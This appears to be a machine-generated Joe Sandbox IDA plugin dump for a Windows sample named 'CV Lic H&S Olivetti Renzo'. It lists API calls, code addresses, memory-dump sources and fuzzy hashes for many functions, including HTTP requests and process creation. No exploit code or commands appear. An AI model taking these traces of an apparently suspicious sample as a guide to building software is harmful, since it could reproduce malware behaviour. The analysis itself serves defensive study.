                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$CtrlParent
                                                                                        • String ID: ComboBox$ListBox
                                                                                        • API String ID: 1383977212-1403004172
                                                                                        • Opcode ID: 7d7b32edb288652c998357f25388d422a625d682db28778a077ebb5658b5396c
                                                                                        • Instruction ID: 140918fcf28eddcd380b347d3022ec2998be01721935e5cc31f29fa693298b84
                                                                                        • Opcode Fuzzy Hash: 7d7b32edb288652c998357f25388d422a625d682db28778a077ebb5658b5396c
                                                                                        • Instruction Fuzzy Hash: DE2180B4E40208BFDB02ABA4CC85EFEBBB9EF49304F104056F651A7191DBB95919DB24
                                                                                        APIs
                                                                                        • GetParent.USER32 ref: 003BBAE3
                                                                                        • GetClassNameW.USER32(00000000,?,00000100), ref: 003BBAF8
                                                                                        • _wcscmp.LIBCMT ref: 003BBB0A
                                                                                        • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 003BBB85
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: ClassMessageNameParentSend_wcscmp
                                                                                        • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                        • API String ID: 1704125052-3381328864
                                                                                        • Opcode ID: 99dd46b76e1220df3e964cc93eb06571795d9a59dcf0c7155aa5fe640b36981d
                                                                                        • Instruction ID: f4495fe55bd1568f88df23e8ab99e3ea6b94e649db83fb95485dce1b0ce54e4e
                                                                                        • Opcode Fuzzy Hash: 99dd46b76e1220df3e964cc93eb06571795d9a59dcf0c7155aa5fe640b36981d
                                                                                        • Instruction Fuzzy Hash: 82110676608307FEFA26B630DC06EE6B79CDB16728F200022FA04F58D5EFE668114518
                                                                                        APIs
                                                                                        • VariantInit.OLEAUT32(?), ref: 003DB2D5
                                                                                        • CoInitialize.OLE32(00000000), ref: 003DB302
                                                                                        • CoUninitialize.OLE32 ref: 003DB30C
                                                                                        • GetRunningObjectTable.OLE32(00000000,?), ref: 003DB40C
                                                                                        • SetErrorMode.KERNEL32(00000001,00000029), ref: 003DB539
                                                                                        • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002), ref: 003DB56D
                                                                                        • CoGetObject.OLE32(?,00000000,0040D91C,?), ref: 003DB590
                                                                                        • SetErrorMode.KERNEL32(00000000), ref: 003DB5A3
                                                                                        • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 003DB623
                                                                                        • VariantClear.OLEAUT32(0040D91C), ref: 003DB633
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                                        • String ID:
                                                                                        • API String ID: 2395222682-0
                                                                                        • Opcode ID: 89f6454e27657fdb13fc545961175b9edccca4680b46da445f74807351a2387f
                                                                                        • Instruction ID: ae061dfa9f0d3bfea0d5ace9bcfe17bfda060e92dc232bdff0adf2a49f096dc0
                                                                                        • Opcode Fuzzy Hash: 89f6454e27657fdb13fc545961175b9edccca4680b46da445f74807351a2387f
                                                                                        • Instruction Fuzzy Hash: 7FC123B2608300EFC701EF65D884A6AB7E9BF89308F01495EF58A9B351DB71ED05CB52
                                                                                        APIs
                                                                                        • __lock.LIBCMT ref: 003AACC1
                                                                                          • Part of subcall function 003A7CF4: __mtinitlocknum.LIBCMT ref: 003A7D06
                                                                                          • Part of subcall function 003A7CF4: EnterCriticalSection.KERNEL32(00000000,?,003A7ADD,0000000D), ref: 003A7D1F
                                                                                        • __calloc_crt.LIBCMT ref: 003AACD2
                                                                                          • Part of subcall function 003A6986: __calloc_impl.LIBCMT ref: 003A6995
                                                                                          • Part of subcall function 003A6986: Sleep.KERNEL32(00000000,000003BC,0039F507,?,0000000E), ref: 003A69AC
                                                                                        • @_EH4_CallFilterFunc@8.LIBCMT ref: 003AACED
                                                                                        • GetStartupInfoW.KERNEL32(?,00436E28,00000064,003A5E91,00436C70,00000014), ref: 003AAD46
                                                                                        • __calloc_crt.LIBCMT ref: 003AAD91
                                                                                        • GetFileType.KERNEL32(00000001), ref: 003AADD8
                                                                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 003AAE11
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
                                                                                        • String ID:
                                                                                        • API String ID: 1426640281-0
                                                                                        • Opcode ID: 8a5f7cb16190a6bc799bd8870fdf4dfc1e055d712ab1589e24cec5c2af9800ac
                                                                                        • Instruction ID: 80ccb4ca5efcea7e3eb61e10f7ce498d3da2d4676b078a867d4b17cd826daf0a
                                                                                        • Opcode Fuzzy Hash: 8a5f7cb16190a6bc799bd8870fdf4dfc1e055d712ab1589e24cec5c2af9800ac
                                                                                        • Instruction Fuzzy Hash: 4481E6B2905B458FDB15CF68C8415ADBBF4EF0B320B24426DE4A6AB3D1D7349803CB56
                                                                                        APIs
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 003C4047
                                                                                        • GetForegroundWindow.USER32(00000000,?,?,?,?,?,003C30A5,?,00000001), ref: 003C405B
                                                                                        • GetWindowThreadProcessId.USER32(00000000), ref: 003C4062
                                                                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,003C30A5,?,00000001), ref: 003C4071
                                                                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 003C4083
                                                                                        • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,003C30A5,?,00000001), ref: 003C409C
                                                                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,003C30A5,?,00000001), ref: 003C40AE
                                                                                        • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,003C30A5,?,00000001), ref: 003C40F3
                                                                                        • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,003C30A5,?,00000001), ref: 003C4108
                                                                                        • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,003C30A5,?,00000001), ref: 003C4113
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                        • String ID:
                                                                                        • API String ID: 2156557900-0
                                                                                        • Opcode ID: 30939a74943547a086d1c24d1564abde486fe947c16215f5fa3a5c6fad244222
                                                                                        • Instruction ID: 2031dcbbfc2818fccd0593402d034a3dfca097c9d6596e6cb95286beceddc22d
                                                                                        • Opcode Fuzzy Hash: 30939a74943547a086d1c24d1564abde486fe947c16215f5fa3a5c6fad244222
                                                                                        • Instruction Fuzzy Hash: D6310476900210AFEB12CF54DC96F6977BDFB51712F158029FA05E7290CBB6DD808B68
                                                                                        APIs
                                                                                        • GetSysColor.USER32(00000008), ref: 0039B496
                                                                                        • SetTextColor.GDI32(?,000000FF), ref: 0039B4A0
                                                                                        • SetBkMode.GDI32(?,00000001), ref: 0039B4B5
                                                                                        • GetStockObject.GDI32(00000005), ref: 0039B4BD
                                                                                        • GetClientRect.USER32(?), ref: 003FDD63
                                                                                        • SendMessageW.USER32(?,00001328,00000000,?), ref: 003FDD7A
                                                                                        • GetWindowDC.USER32(?), ref: 003FDD86
                                                                                        • GetPixel.GDI32(00000000,?,?), ref: 003FDD95
                                                                                        • ReleaseDC.USER32(?,00000000), ref: 003FDDA7
                                                                                        • GetSysColor.USER32(00000005), ref: 003FDDC5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
                                                                                        • String ID:
                                                                                        • API String ID: 3430376129-0
                                                                                        • Opcode ID: 2e7debbefee7d034e5da764ddd91746f220a3d7240e6b936d8593d7d63a52b44
                                                                                        • Instruction ID: 90c18e21c7f5581c9c7ddbcd66d3a35e7d804342e9db7bf1a0adf7aff8c8f709
                                                                                        • Opcode Fuzzy Hash: 2e7debbefee7d034e5da764ddd91746f220a3d7240e6b936d8593d7d63a52b44
                                                                                        • Instruction Fuzzy Hash: 4B115131900205FFDB126FA4ED08BA97F65EB49325F114635FA66A90E2CB310955EF14
                                                                                        APIs
                                                                                        • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 003830DC
                                                                                        • CoUninitialize.OLE32(?,00000000), ref: 00383181
                                                                                        • UnregisterHotKey.USER32(?), ref: 003832A9
                                                                                        • DestroyWindow.USER32(?), ref: 003F5079
                                                                                        • FreeLibrary.KERNEL32(?), ref: 003F50F8
                                                                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 003F5125
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                        • String ID: close all
                                                                                        • API String ID: 469580280-3243417748
                                                                                        • Opcode ID: 66dad8edda6cfc31ca4280854b6aaf4a33df390a0409fa57426cd54f9c02b7a0
                                                                                        • Instruction ID: 87ad4b19c843cf934398ac24376b0fdb3eba3ff468d398c7faff201a6c3dda04
                                                                                        • Opcode Fuzzy Hash: 66dad8edda6cfc31ca4280854b6aaf4a33df390a0409fa57426cd54f9c02b7a0
                                                                                        • Instruction Fuzzy Hash: AF9139746106068FC706FF24C995E68F3A4FF05B04F5582E9E50AAB262DF30AE5ACF54
                                                                                        APIs
                                                                                        • SetWindowLongW.USER32(?,000000EB), ref: 0039CC15
                                                                                          • Part of subcall function 0039CCCD: GetClientRect.USER32(?,?), ref: 0039CCF6
                                                                                          • Part of subcall function 0039CCCD: GetWindowRect.USER32(?,?), ref: 0039CD37
                                                                                          • Part of subcall function 0039CCCD: ScreenToClient.USER32(?,?), ref: 0039CD5F
                                                                                        • GetDC.USER32 ref: 003FD137
                                                                                        • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 003FD14A
                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 003FD158
                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 003FD16D
                                                                                        • ReleaseDC.USER32(?,00000000), ref: 003FD175
                                                                                        • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 003FD200
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                        • String ID: U
                                                                                        • API String ID: 4009187628-3372436214
                                                                                        • Opcode ID: b6d7fbc4c5b86e6958b28bde099dd485b8cbe7eb12d9ab77c2c1dc528afabed0
                                                                                        • Instruction ID: 2faa9dadfe624802d5b6a48bd0dbcabea9ff0645554803a9e0d4f93ddba85df7
                                                                                        • Opcode Fuzzy Hash: b6d7fbc4c5b86e6958b28bde099dd485b8cbe7eb12d9ab77c2c1dc528afabed0
                                                                                        • Instruction Fuzzy Hash: 6D71CE35400209EFCF239F64C889ABA7BB6FF49310F194669EE555A2A6C7319C81DF60
                                                                                        APIs
                                                                                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 003D45FF
                                                                                        • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 003D462B
                                                                                        • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 003D466D
                                                                                        • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 003D4682
                                                                                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 003D468F
                                                                                        • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 003D46BF
                                                                                        • InternetCloseHandle.WININET(00000000), ref: 003D4706
                                                                                          • Part of subcall function 003D5052: GetLastError.KERNEL32(?,?,003D43CC,00000000,00000000,00000001), ref: 003D5067
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
                                                                                        • String ID:
                                                                                        • API String ID: 1241431887-3916222277
                                                                                        • Opcode ID: 47c83a6eae2f2baf6b4c2c204b6cd9058397529d027cb40b6e7cd0f38c24176b
                                                                                        • Instruction ID: 1c0a8fb260a2eb58c0ad8f28f0a62812e94776de84c8dd4f1427e88c75e2ce8a
                                                                                        • Opcode Fuzzy Hash: 47c83a6eae2f2baf6b4c2c204b6cd9058397529d027cb40b6e7cd0f38c24176b
                                                                                        • Instruction Fuzzy Hash: 984161B2901205BFEB129F90DC85FBB77ACFF09354F004126FA16AA251D770D9448BA4
                                                                                        APIs
                                                                                        • GetModuleFileNameW.KERNEL32(?,?,00000104,?,0041DC00), ref: 003DB715
                                                                                        • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0041DC00), ref: 003DB749
                                                                                        • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 003DB8C1
                                                                                        • SysFreeString.OLEAUT32(?), ref: 003DB8EB
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                                                        • String ID:
                                                                                        • API String ID: 560350794-0
                                                                                        • Opcode ID: 51d55297ab63a73ecaf61d1c57d77869c0af4fca9388997628b2eaf3cc5a74a4
                                                                                        • Instruction ID: 4fe353f30b67685d0c6471491d44daea25d611f211a39778600b1ead8050e3e3
                                                                                        • Opcode Fuzzy Hash: 51d55297ab63a73ecaf61d1c57d77869c0af4fca9388997628b2eaf3cc5a74a4
                                                                                        • Instruction Fuzzy Hash: 1BF14C76A00209EFCF05DF94D884EAEB7B9FF49315F128499F905AB250DB31AE45CB90
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 003E24F5
                                                                                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 003E2688
                                                                                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 003E26AC
                                                                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 003E26EC
                                                                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 003E270E
                                                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 003E286F
                                                                                        • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 003E28A1
                                                                                        • CloseHandle.KERNEL32(?), ref: 003E28D0
                                                                                        • CloseHandle.KERNEL32(?), ref: 003E2947
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                                        • String ID:
                                                                                        • API String ID: 4090791747-0
                                                                                        • Opcode ID: 6d50ee59557e5af814f5cfb162dfbece8934fbd300164065d2e2abebebc7088d
                                                                                        • Instruction ID: 421c10b639f38ac001fa51cfaa0a243b8d908d82ad4c1b302738e55cc142916a
                                                                                        • Opcode Fuzzy Hash: 6d50ee59557e5af814f5cfb162dfbece8934fbd300164065d2e2abebebc7088d
                                                                                        • Instruction Fuzzy Hash: 12D1AF316043509FCB16EF25C891B6ABBE9AF85310F19865DF8999F2E2DB30DC44CB52
                                                                                        APIs
                                                                                        • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 003EB3F4
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: InvalidateRect
                                                                                        • String ID:
                                                                                        • API String ID: 634782764-0
                                                                                        • Opcode ID: ddc184c94e8b469e955512c10551e487b64e2caf99b985bc0914e1d7741fdb3c
                                                                                        • Instruction ID: 14773df560b6ad39b548d87dd3e8fd53d051b947e129bcc6ee282bfdebd28459
                                                                                        • Opcode Fuzzy Hash: ddc184c94e8b469e955512c10551e487b64e2caf99b985bc0914e1d7741fdb3c
                                                                                        • Instruction Fuzzy Hash: 3B51D7345012A4BFEF239F67CC86BAFBB68AB05314F244211F654EA5E1C771E940CB50
                                                                                        APIs
                                                                                        • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 003FDB1B
                                                                                        • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 003FDB3C
                                                                                        • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 003FDB51
                                                                                        • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 003FDB6E
                                                                                        • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 003FDB95
                                                                                        • DestroyIcon.USER32(00000000,?,?,?,?,?,?,0039A67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 003FDBA0
                                                                                        • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 003FDBBD
                                                                                        • DestroyIcon.USER32(00000000,?,?,?,?,?,?,0039A67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 003FDBC8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                                        • String ID:
                                                                                        • API String ID: 1268354404-0
                                                                                        • Opcode ID: 59a02547af0e8a2540a327a7ccc765c64fdc276c516f139e30a9287a16205482
                                                                                        • Instruction ID: 2c2be495fa4fdd6f1b2ee4d7785c1d1af8f3b5acb670a6309bc79f4fb8591639
                                                                                        • Opcode Fuzzy Hash: 59a02547af0e8a2540a327a7ccc765c64fdc276c516f139e30a9287a16205482
                                                                                        • Instruction Fuzzy Hash: 0C518F70600609EFDF22DFA4CC86FAA77B9EB18750F110628F9469B690D770ED90DB94
                                                                                        APIs
                                                                                          • Part of subcall function 003C6EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,003C5FA6,?), ref: 003C6ED8
                                                                                          • Part of subcall function 003C6EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,003C5FA6,?), ref: 003C6EF1
                                                                                          • Part of subcall function 003C72CB: GetFileAttributesW.KERNEL32(?,003C6019), ref: 003C72CC
                                                                                        • lstrcmpiW.KERNEL32(?,?), ref: 003C75CA
                                                                                        • _wcscmp.LIBCMT ref: 003C75E2
                                                                                        • MoveFileW.KERNEL32(?,?), ref: 003C75FB
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
